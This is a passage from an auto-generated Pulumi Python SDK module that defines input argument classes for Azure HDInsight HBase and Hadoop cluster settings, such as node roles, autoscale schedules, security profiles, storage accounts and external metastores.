def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HBaseClusterRolesWorkerNodeArgs:
def __init__(__self__, *,
target_instance_count: pulumi.Input[int],
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
autoscale: Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleArgs']] = None,
min_instance_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
:param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleArgs'] autoscale: A `autoscale` block as defined below.
:param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if autoscale is not None:
pulumi.set(__self__, "autoscale", autoscale)
if min_instance_count is not None:
warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
if min_instance_count is not None:
pulumi.set(__self__, "min_instance_count", min_instance_count)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of instances which should be run for the Worker Nodes.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def autoscale(self) -> Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleArgs']]:
"""
A `autoscale` block as defined below.
"""
return pulumi.get(self, "autoscale")
@autoscale.setter
def autoscale(self, value: Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleArgs']]):
pulumi.set(self, "autoscale", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_instance_count", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HBaseClusterRolesWorkerNodeAutoscaleArgs:
def __init__(__self__, *,
recurrence: Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs']] = None):
"""
:param pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs'] recurrence: A `recurrence` block as defined below.
"""
if recurrence is not None:
pulumi.set(__self__, "recurrence", recurrence)
@property
@pulumi.getter
def recurrence(self) -> Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]:
"""
A `recurrence` block as defined below.
"""
return pulumi.get(self, "recurrence")
@recurrence.setter
def recurrence(self, value: Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]):
pulumi.set(self, "recurrence", value)
@pulumi.input_type
class HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs:
def __init__(__self__, *,
schedules: pulumi.Input[Sequence[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]],
timezone: pulumi.Input[str]):
"""
:param pulumi.Input[Sequence[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]] schedules: A list of `schedule` blocks as defined below.
:param pulumi.Input[str] timezone: The time zone for the autoscale schedule times.
"""
pulumi.set(__self__, "schedules", schedules)
pulumi.set(__self__, "timezone", timezone)
@property
@pulumi.getter
def schedules(self) -> pulumi.Input[Sequence[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]:
"""
A list of `schedule` blocks as defined below.
"""
return pulumi.get(self, "schedules")
@schedules.setter
def schedules(self, value: pulumi.Input[Sequence[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]):
pulumi.set(self, "schedules", value)
@property
@pulumi.getter
def timezone(self) -> pulumi.Input[str]:
"""
The time zone for the autoscale schedule times.
"""
return pulumi.get(self, "timezone")
@timezone.setter
def timezone(self, value: pulumi.Input[str]):
pulumi.set(self, "timezone", value)
@pulumi.input_type
class HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs:
def __init__(__self__, *,
days: pulumi.Input[Sequence[pulumi.Input[str]]],
target_instance_count: pulumi.Input[int],
time: pulumi.Input[str]):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] days: The days of the week to perform autoscale.
:param pulumi.Input[int] target_instance_count: The number of worker nodes to autoscale at the specified time.
:param pulumi.Input[str] time: The time of day to perform the autoscale in 24hour format.
"""
pulumi.set(__self__, "days", days)
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "time", time)
@property
@pulumi.getter
def days(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The days of the week to perform autoscale.
"""
return pulumi.get(self, "days")
@days.setter
def days(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "days", value)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of worker nodes to autoscale at the specified time.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def time(self) -> pulumi.Input[str]:
"""
The time of day to perform the autoscale in 24hour format.
"""
return pulumi.get(self, "time")
@time.setter
def time(self, value: pulumi.Input[str]):
pulumi.set(self, "time", value)
@pulumi.input_type
class HBaseClusterRolesZookeeperNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HBaseClusterSecurityProfileArgs:
def __init__(__self__, *,
aadds_resource_id: pulumi.Input[str],
domain_name: pulumi.Input[str],
domain_user_password: pulumi.Input[str],
domain_username: pulumi.Input[str],
ldaps_urls: pulumi.Input[Sequence[pulumi.Input[str]]],
msi_resource_id: pulumi.Input[str],
cluster_users_group_dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] aadds_resource_id: The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_name: The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_user_password: The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_username: The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ldaps_urls: A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
:param pulumi.Input[str] msi_resource_id: The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cluster_users_group_dns: A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "aadds_resource_id", aadds_resource_id)
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "domain_user_password", domain_user_password)
pulumi.set(__self__, "domain_username", domain_username)
pulumi.set(__self__, "ldaps_urls", ldaps_urls)
pulumi.set(__self__, "msi_resource_id", msi_resource_id)
if cluster_users_group_dns is not None:
pulumi.set(__self__, "cluster_users_group_dns", cluster_users_group_dns)
@property
@pulumi.getter(name="aaddsResourceId")
def aadds_resource_id(self) -> pulumi.Input[str]:
"""
The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "aadds_resource_id")
@aadds_resource_id.setter
def aadds_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "aadds_resource_id", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="domainUserPassword")
def domain_user_password(self) -> pulumi.Input[str]:
"""
The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_user_password")
@domain_user_password.setter
def domain_user_password(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_user_password", value)
@property
@pulumi.getter(name="domainUsername")
def domain_username(self) -> pulumi.Input[str]:
"""
The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_username")
@domain_username.setter
def domain_username(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_username", value)
@property
@pulumi.getter(name="ldapsUrls")
def ldaps_urls(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ldaps_urls")
@ldaps_urls.setter
def ldaps_urls(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "ldaps_urls", value)
@property
@pulumi.getter(name="msiResourceId")
def msi_resource_id(self) -> pulumi.Input[str]:
"""
The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "msi_resource_id")
@msi_resource_id.setter
def msi_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "msi_resource_id", value)
@property
@pulumi.getter(name="clusterUsersGroupDns")
def cluster_users_group_dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "cluster_users_group_dns")
@cluster_users_group_dns.setter
def cluster_users_group_dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "cluster_users_group_dns", value)
@pulumi.input_type
class HBaseClusterStorageAccountArgs:
def __init__(__self__, *,
is_default: pulumi.Input[bool],
storage_account_key: pulumi.Input[str],
storage_container_id: pulumi.Input[str]):
"""
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "storage_account_key", storage_account_key)
pulumi.set(__self__, "storage_container_id", storage_container_id)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="storageAccountKey")
def storage_account_key(self) -> pulumi.Input[str]:
"""
The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_key")
@storage_account_key.setter
def storage_account_key(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_key", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class HBaseClusterStorageAccountGen2Args:
def __init__(__self__, *,
filesystem_id: pulumi.Input[str],
is_default: pulumi.Input[bool],
managed_identity_resource_id: pulumi.Input[str],
storage_resource_id: pulumi.Input[str]):
"""
:param pulumi.Input[str] filesystem_id: The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] managed_identity_resource_id: The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_resource_id: The ID of the Storage Account. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "filesystem_id", filesystem_id)
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "managed_identity_resource_id", managed_identity_resource_id)
pulumi.set(__self__, "storage_resource_id", storage_resource_id)
@property
@pulumi.getter(name="filesystemId")
def filesystem_id(self) -> pulumi.Input[str]:
"""
The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "filesystem_id")
@filesystem_id.setter
def filesystem_id(self, value: pulumi.Input[str]):
pulumi.set(self, "filesystem_id", value)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="managedIdentityResourceId")
def managed_identity_resource_id(self) -> pulumi.Input[str]:
"""
The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "managed_identity_resource_id")
@managed_identity_resource_id.setter
def managed_identity_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "managed_identity_resource_id", value)
@property
@pulumi.getter(name="storageResourceId")
def storage_resource_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_resource_id")
@storage_resource_id.setter
def storage_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_resource_id", value)
@pulumi.input_type
class HadoopClusterComponentVersionArgs:
def __init__(__self__, *,
hadoop: pulumi.Input[str]):
"""
:param pulumi.Input[str] hadoop: The version of Hadoop which should be used for this HDInsight Hadoop Cluster. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "hadoop", hadoop)
@property
@pulumi.getter
def hadoop(self) -> pulumi.Input[str]:
"""
The version of Hadoop which should be used for this HDInsight Hadoop Cluster. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "hadoop")
@hadoop.setter
def hadoop(self, value: pulumi.Input[str]):
pulumi.set(self, "hadoop", value)
@pulumi.input_type
class HadoopClusterGatewayArgs:
def __init__(__self__, *,
password: pulumi.Input[str],
username: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] password: The password used for the Ambari Portal.
:param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
if enabled is not None:
warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The password used for the Ambari Portal.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The username used for the Ambari Portal. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class HadoopClusterMetastoresArgs:
def __init__(__self__, *,
ambari: Optional[pulumi.Input['HadoopClusterMetastoresAmbariArgs']] = None,
hive: Optional[pulumi.Input['HadoopClusterMetastoresHiveArgs']] = None,
oozie: Optional[pulumi.Input['HadoopClusterMetastoresOozieArgs']] = None):
"""
:param pulumi.Input['HadoopClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
:param pulumi.Input['HadoopClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
:param pulumi.Input['HadoopClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
"""
if ambari is not None:
pulumi.set(__self__, "ambari", ambari)
if hive is not None:
pulumi.set(__self__, "hive", hive)
if oozie is not None:
pulumi.set(__self__, "oozie", oozie)
@property
@pulumi.getter
def ambari(self) -> Optional[pulumi.Input['HadoopClusterMetastoresAmbariArgs']]:
"""
An `ambari` block as defined below.
"""
return pulumi.get(self, "ambari")
@ambari.setter
def ambari(self, value: Optional[pulumi.Input['HadoopClusterMetastoresAmbariArgs']]):
pulumi.set(self, "ambari", value)
@property
@pulumi.getter
def hive(self) -> Optional[pulumi.Input['HadoopClusterMetastoresHiveArgs']]:
"""
A `hive` block as defined below.
"""
return pulumi.get(self, "hive")
@hive.setter
def hive(self, value: Optional[pulumi.Input['HadoopClusterMetastoresHiveArgs']]):
pulumi.set(self, "hive", value)
@property
@pulumi.getter
def oozie(self) -> Optional[pulumi.Input['HadoopClusterMetastoresOozieArgs']]:
"""
An `oozie` block as defined below.
"""
return pulumi.get(self, "oozie")
@oozie.setter
def oozie(self, value: Optional[pulumi.Input['HadoopClusterMetastoresOozieArgs']]):
pulumi.set(self, "oozie", value)
@pulumi.input_type
class HadoopClusterMetastoresAmbariArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class HadoopClusterMetastoresHiveArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class HadoopClusterMetastoresOozieArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
